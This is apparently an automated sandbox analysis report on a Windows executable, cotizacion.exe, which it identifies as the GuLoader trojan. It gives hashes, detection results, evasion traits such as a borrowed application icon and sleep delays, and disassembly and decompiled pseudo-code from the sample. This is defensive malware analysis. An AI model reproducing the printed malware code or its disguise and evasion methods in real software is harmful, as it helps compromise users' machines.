Play interactive tour

Edit tour

Analysis Report cotizacion.exe

Overview

General Information

Sample Name:	cotizacion.exe
Analysis ID:	395265
MD5:	35f5d83dbc44b907d379c5ab35f725f8
SHA1:	745ba0ab77e726e01d3f2fca4506383948906e24
SHA256:	daf8d6de50e27c49b372d6cb0a7c6b7cd7a0946f959d13d3d3eb8d5d892c9eb7
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Machine Learning detection for sample

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file contains an invalid checksum

PE file contains strange resources

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

cotizacion.exe (PID: 1976 cmdline: 'C:\Users\user\Desktop\cotizacion.exe' MD5: 35F5D83DBC44B907D379C5AB35F725F8)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
cotizacion.exe	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security
00000000.00000000.229099820.0000000000401000.00000020.00020000.sdmp	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.cotizacion.exe.400000.0.unpack	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security
0.2.cotizacion.exe.400000.0.unpack	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: cotizacion.exe	Virustotal: Detection: 62%	Perma Link
Source: cotizacion.exe	Metadefender: Detection: 32%	Perma Link
Source: cotizacion.exe	ReversingLabs: Detection: 70%

Machine Learning detection for sample

Show sources

Source: cotizacion.exe

Joe Sandbox ML: detected

Source: cotizacion.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: cotizacion.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cotizacion.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: cotizacion.exe, 00000000.00000002.493866250.00000000020A0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs cotizacion.exe
Source: cotizacion.exe, 00000000.00000002.493157991.000000000041A000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameForkvakledes.exe vs cotizacion.exe
Source: cotizacion.exe, 00000000.00000002.502916759.0000000004FA0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs cotizacion.exe
Source: cotizacion.exe, 00000000.00000002.494036894.0000000002200000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameForkvakledes.exeFE2XCluster-CCluster-C vs cotizacion.exe
Source: cotizacion.exe	Binary or memory string: OriginalFilenameForkvakledes.exe vs cotizacion.exe

Source: cotizacion.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal68.troj.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\cotizacion.exe

File created: C:\Users\user~1\AppData\Local\Temp\~DF8BE9C0E48D19B38F.TMP

Jump to behavior

Source: cotizacion.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\cotizacion.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\cotizacion.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: cotizacion.exe	Virustotal: Detection: 62%
Source: cotizacion.exe	Metadefender: Detection: 32%
Source: cotizacion.exe	ReversingLabs: Detection: 70%

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: cotizacion.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.229099820.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0.0.cotizacion.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.cotizacion.exe.400000.0.unpack, type: UNPACKEDPE

Source: cotizacion.exe

Static PE information: real checksum: 0x279ca should be: 0x1d63d

Source: C:\Users\user\Desktop\cotizacion.exe	Code function: 0_2_00407C52 push es; ret	0_2_00407CB9
Source: C:\Users\user\Desktop\cotizacion.exe	Code function: 0_2_00401275 push 02A3CF73h; iretd	0_2_0040141C
Source: C:\Users\user\Desktop\cotizacion.exe	Code function: 0_2_00406E16 pushad ; ret	0_2_00406E19
Source: C:\Users\user\Desktop\cotizacion.exe	Code function: 0_2_0040261A push es; retf	0_2_0040265D
Source: C:\Users\user\Desktop\cotizacion.exe	Code function: 0_2_004078E3 pushad ; ret	0_2_004078E5
Source: C:\Users\user\Desktop\cotizacion.exe	Code function: 0_2_004092E9 push es; ret	0_2_004092F1
Source: C:\Users\user\Desktop\cotizacion.exe	Code function: 0_2_00409C8F push esi; iretd	0_2_00409C93
Source: C:\Users\user\Desktop\cotizacion.exe	Code function: 0_2_00406C97 push cs; ret	0_2_00406CD9
Source: C:\Users\user\Desktop\cotizacion.exe	Code function: 0_2_00405140 push ss; retf	0_2_00405141
Source: C:\Users\user\Desktop\cotizacion.exe	Code function: 0_2_00407D73 pushad ; retf	0_2_00407D75
Source: C:\Users\user\Desktop\cotizacion.exe	Code function: 0_2_00404D04 push es; ret	0_2_00404D05
Source: C:\Users\user\Desktop\cotizacion.exe	Code function: 0_2_00405310 push ecx; ret	0_2_00405311
Source: C:\Users\user\Desktop\cotizacion.exe	Code function: 0_2_00403D1F push eax; ret	0_2_00403D21
Source: C:\Users\user\Desktop\cotizacion.exe	Code function: 0_2_00404BD3 push es; retf	0_2_00404BD5
Source: C:\Users\user\Desktop\cotizacion.exe	Code function: 0_2_0040298C push ecx; retf	0_2_0040298D
Source: C:\Users\user\Desktop\cotizacion.exe	Code function: 0_2_00403792 push eax; ret	0_2_00403795
Source: C:\Users\user\Desktop\cotizacion.exe	Code function: 0_2_004037AE push eax; ret	0_2_004037B1
Source: C:\Users\user\Desktop\cotizacion.exe	Code function: 0_2_004029B7 push es; retf	0_2_004029B9

Hooking and other Techniques for Hiding and Protection:

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Show sources

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (71).png

Source: C:\Users\user\Desktop\cotizacion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cotizacion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cotizacion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cotizacion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cotizacion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cotizacion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cotizacion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cotizacion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cotizacion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cotizacion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cotizacion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cotizacion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cotizacion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cotizacion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cotizacion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cotizacion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cotizacion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cotizacion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cotizacion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cotizacion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cotizacion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cotizacion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\cotizacion.exe	Window / User API: threadDelayed 8041			Jump to behavior
Source: C:\Users\user\Desktop\cotizacion.exe	Window / User API: threadDelayed 1959			Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\cotizacion.exe

Last function: Thread delayed

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: cotizacion.exe, 00000000.00000002.493462189.0000000000C20000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: cotizacion.exe, 00000000.00000002.493462189.0000000000C20000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: cotizacion.exe, 00000000.00000002.493462189.0000000000C20000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: cotizacion.exe, 00000000.00000002.493462189.0000000000C20000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Masquerading1	OS Credential Dumping	Process Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Data Obfuscation	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Application Window Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	System Information Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
cotizacion.exe	63%	Virustotal		Browse
cotizacion.exe	32%	Metadefender		Browse
cotizacion.exe	70%	ReversingLabs	Win32.Trojan.VBObfuse
cotizacion.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	395265
Start date:	22.04.2021
Start time:	11:16:18
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	cotizacion.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.troj.winEXE@1/0@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 95.3% (good quality ratio 56.3%) Quality average: 28.7% Quality standard deviation: 26.6%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.714049017467046
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	cotizacion.exe
File size:	118784
MD5:	35f5d83dbc44b907d379c5ab35f725f8
SHA1:	745ba0ab77e726e01d3f2fca4506383948906e24
SHA256:	daf8d6de50e27c49b372d6cb0a7c6b7cd7a0946f959d13d3d3eb8d5d892c9eb7
SHA512:	76404764d6eb8d7392207ced43ba52b39702bdcff84e0b3842af2fa35105000abdf8d1e8c34a778fceab651ae4f52369d6e85645e0452db49c53ade5cd37e775
SSDEEP:	1536:PA1ybwSbXGgN79EiSJ99mLUaYugzYxrm19Ko2o/1hQr5UOaM0tmxswXpuqltL:P0KbVN7VSDXUxrh0G
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L....).M.................p...`......h.............@................

File Icon


Icon Hash:	c0c6f2e0e4fefe3f

Static PE Info

General
Entrypoint:	0x401968
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4DAB29E3 [Sun Apr 17 17:56:51 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	7677b40f5f8927412a58af017314f1ed

Entrypoint Preview

Instruction
push 0040F0A8h
call 00007FC704574F23h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], dh
loopne 00007FC704574F21h
mov edx, 4F5D2BC2h
mov es, ax
dec ebp
dec ecx
push 00000037h
hlt
and dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebp+45h], cl
push esp
inc ecx
dec esp
dec edi
inc edi
dec ecx
inc ebx
inc ecx
dec esp
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
or al, ACh
sbb eax, dword ptr [esi]
push ebx
aaa
loop 00007FC704574ED9h
inc ebp
xchg eax, esi
and byte ptr [eax+4Fh], bl
lea ecx, dword ptr [esp+esi]
je 00007FC704574F4Ch
in al, dx
or al, D1h
and cl, bl
call far 69DBh : CB71A849h
xchg eax, edi
wait

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17324	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1a000	0x383a	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1a8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x16908	0x17000	False	0.442064368207	data	6.09226152403	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x18000	0x1260	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x1a000	0x383a	0x4000	False	0.462524414062	data	5.1445020687	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1cf92	0x8a8	data
RT_ICON	0x1c8ca	0x6c8	data
RT_ICON	0x1c362	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x1b2ba	0x10a8	data
RT_ICON	0x1a932	0x988	data
RT_ICON	0x1a4ca	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x1a470	0x5a	data
RT_VERSION	0x1a1e0	0x290	MS Windows COFF PA-RISC object file	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaLenBstr, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, __vbaLenBstrB, _adj_fdiv_m32, __vbaAryDestruct, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaObjVar, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaLateMemCall, __vbaVarAdd, __vbaStrToAnsi, __vbaVarDup, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, __vbaFPInt, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0409 0x04b0
InternalName	Forkvakledes
FileVersion	1.00
CompanyName	Cluster-C
Comments	Cluster-C
ProductName	Cluster-C
ProductVersion	1.00
FileDescription	Cluster-C
OriginalFilename	Forkvakledes.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: cotizacion.exe PID: 1976 Parent PID: 5576

General

Start time:	11:17:10
Start date:	22/04/2021
Path:	C:\Users\user\Desktop\cotizacion.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\cotizacion.exe'
Imagebase:	0x400000
File size:	118784 bytes
MD5 hash:	35F5D83DBC44B907D379C5AB35F725F8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000000.00000002.493125170.0000000000401000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000000.00000000.229099820.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: cotizacion.exe PID: 1976 Parent PID: 5576 cotizacion.exeCOMMON

Execution Graph

Execution Coverage:	15.4%
Dynamic/Decrypted Code Coverage:	1.8%
Signature Coverage:	0%
Total number of Nodes:	391
Total number of Limit Nodes:	29

Executed Functions

Function 00412574, Relevance: 288.8, APIs: 140, Strings: 24, Instructions: 1783
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00412574(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int _a4) {
				void* _v5;
				char _v8;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				long long* _v28;
				intOrPtr _v40;
				long long _v48;
				intOrPtr _v52;
				long long _v60;
				long long _v68;
				char _v72;
				long long _v76;
				void* _v80;
				void* _v96;
				signed int _v100;
				long long _v108;
				short _v112;
				short _v116;
				char _v132;
				long long _v140;
				signed int _v144;
				short _v148;
				void* _v152;
				long long _v160;
				intOrPtr _v164;
				short _v168;
				short _v172;
				long long _v180;
				long long _v188;
				short _v192;
				long long _v200;
				char _v204;
				intOrPtr _v208;
				long long _v212;
				long long _v220;
				short _v224;
				signed int _v228;
				signed int _v232;
				long long _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				long long _v252;
				intOrPtr _v256;
				long long _v260;
				intOrPtr _v264;
				short _v268;
				short _v272;
				short _v276;
				short _v280;
				short _v284;
				long long _v292;
				intOrPtr _v296;
				long long _v300;
				intOrPtr _v304;
				long long _v308;
				char _v312;
				char _v316;
				char _v320;
				signed int _v324;
				char _v328;
				signed int _v336;
				char _v344;
				signed int _v352;
				char _v360;
				signed int _v368;
				char _v376;
				signed int _v384;
				char _v392;
				signed int _v400;
				char _v408;
				signed int _v416;
				char _v424;
				signed int _v432;
				char _v440;
				signed int _v444;
				signed int _v448;
				char _v456;
				char* _v480;
				intOrPtr _v488;
				intOrPtr _v512;
				intOrPtr _v520;
				short _v556;
				void* _v560;
				signed int _v564;
				char _v568;
				char _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				long long _v584;
				intOrPtr _v588;
				long long _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int _v736;
				signed int* _v740;
				signed int _v744;
				signed int* _v748;
				signed int _v752;
				signed int _v756;
				signed int* _v760;
				signed int _v764;
				char* _t984;
				signed int _t992;
				signed int _t1003;
				signed int _t1015;
				signed int _t1022;
				signed int _t1027;
				signed int _t1044;
				signed int _t1049;
				signed int _t1068;
				signed int _t1081;
				signed int _t1092;
				signed int _t1095;
				signed int _t1122;
				signed int _t1125;
				signed int _t1136;
				signed int _t1156;
				signed int _t1160;
				signed int _t1182;
				signed int _t1189;
				signed int _t1203;
				signed int _t1207;
				signed int _t1213;
				signed int _t1225;
				signed int _t1231;
				signed int _t1248;
				signed int _t1253;
				char* _t1261;
				char* _t1262;
				char* _t1265;
				char* _t1269;
				char* _t1270;
				short _t1279;
				char* _t1286;
				signed int _t1287;
				signed int _t1293;
				signed int _t1295;
				signed int _t1301;
				signed int _t1302;
				signed int _t1306;
				signed int _t1307;
				signed int _t1311;
				signed int _t1329;
				char* _t1333;
				signed int* _t1338;
				char* _t1354;
				signed int* _t1355;
				signed int _t1358;
				signed int _t1365;
				char* _t1369;
				char* _t1373;
				char* _t1375;
				char* _t1377;
				void* _t1435;
				void* _t1438;
				long long* _t1439;
				void* _t1440;
				long long* _t1441;
				intOrPtr* _t1442;
				void* _t1443;
				void* _t1444;
				signed int _t1450;
				long long _t1478;
				long long _t1520;

				_t1439 = _t1438 - 0x18;
				 *[fs:0x0] = _t1439;
				L004016F0();
				_v28 = _t1439;
				_v24 = E004011A8;
				_v20 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4016f6, _t1435);
				_v8 = 1;
				_v8 = 2;
				_v368 = 0x80020004;
				_v376 = 0xa;
				_v352 = 0x80020004;
				_v360 = 0xa;
				_v336 = 0x80020004;
				_v344 = 0xa;
				_push( &_v376);
				_push( &_v360);
				_push( &_v344);
				_t1478 =  *0x401480;
				_v72 = _t1478;
				asm("fld1");
				_v80 = _t1478;
				asm("fld1");
				 *_t1439 = _t1478;
				L00401948();
				_v188 = _t1478;
				_push( &_v376);
				_push( &_v360);
				_push( &_v344);
				_push(3);
				L00401942();
				_t1440 = _t1439 + 0x10;
				_v8 = 3;
				_v384 = 5;
				_v392 = 2;
				_v368 = 0x63;
				_v376 = 2;
				_t31 =  &_v352;
				 *_t31 = _v352 & 0x00000000;
				_v360 = 2;
				_v336 = 0x64;
				_v344 = 2;
				_push( &_v392);
				_push( &_v376);
				_push( &_v360);
				_push( &_v344);
				_push( &_v408);
				L0040192A();
				_push( &_v408);
				_t984 =  &_v312;
				_push(_t984);
				L00401930();
				_push(_t984);
				L00401936();
				L0040193C();
				asm("fcomp qword [0x401478]");
				asm("fnstsw ax");
				asm("sahf");
				if( *_t31 == 0) {
					_t44 =  &_v632;
					 *_t44 = _v632 & 0x00000000;
					__eflags =  *_t44;
				} else {
					_v632 = 1;
				}
				_v596 =  ~_v632;
				_t1369 =  &_v312;
				L00401924();
				_push( &_v408);
				_push( &_v392);
				_push( &_v376);
				_push( &_v360);
				_push( &_v344);
				_push(5);
				L00401942();
				_t1441 = _t1440 + 0x18;
				_t992 = _v596;
				if(_t992 != 0) {
					_v8 = 4;
					_v8 = 5;
					_push(0);
					_push(L"Filmselskabets");
					_push( &_v344);
					L00401918();
					_t992 = 0x10;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v52);
					L0040191E();
					_t1369 =  &_v344;
					L00401912();
				}
				_v8 = 7;
				_push(0x411624);
				L0040190C();
				if(_t992 != 0x61) {
					_v8 = 8;
					_t1365 =  *((intOrPtr*)( *_a4 + 0x254))(_a4, 0x73);
					asm("fclex");
					_v596 = _t1365;
					_t1450 = _v596;
					if(_t1450 >= 0) {
						_t71 =  &_v636;
						 *_t71 = _v636 & 0x00000000;
						__eflags =  *_t71;
					} else {
						_push(0x254);
						_push(0x41017c);
						_push(_a4);
						_push(_v596);
						L00401906();
						_v636 = _t1365;
					}
				}
				_v8 = 0xa;
				_v352 = 0x80020004;
				_v360 = 0xa;
				_v336 = 0x80020004;
				_v344 = 0xa;
				_push( &_v360);
				_push( &_v344);
				asm("fld1");
				_push(_t1369);
				_push(_t1369);
				_v140 = _t1478;
				asm("fld1");
				_push(_t1369);
				_push(_t1369);
				_v148 = _t1478;
				asm("fld1");
				_push(_t1369);
				_push(_t1369);
				 *_t1441 = _t1478;
				L00401900();
				L0040193C();
				asm("fcomp qword [0x401470]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t1450 == 0) {
					_t81 =  &_v640;
					 *_t81 = _v640 & 0x00000000;
					__eflags =  *_t81;
				} else {
					_v640 = 1;
				}
				_v596 =  ~_v640;
				_push( &_v360);
				_push( &_v344);
				_push(2);
				L00401942();
				_t1442 = _t1441 + 0xc;
				if(_v596 != 0) {
					_v8 = 0xb;
					_v8 = 0xc;
					_v448 = _a4;
					_v456 = 9;
					_v480 = L"solicit";
					_v488 = 8;
					_v512 = 0x58e1c9;
					_v520 = 3;
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(3);
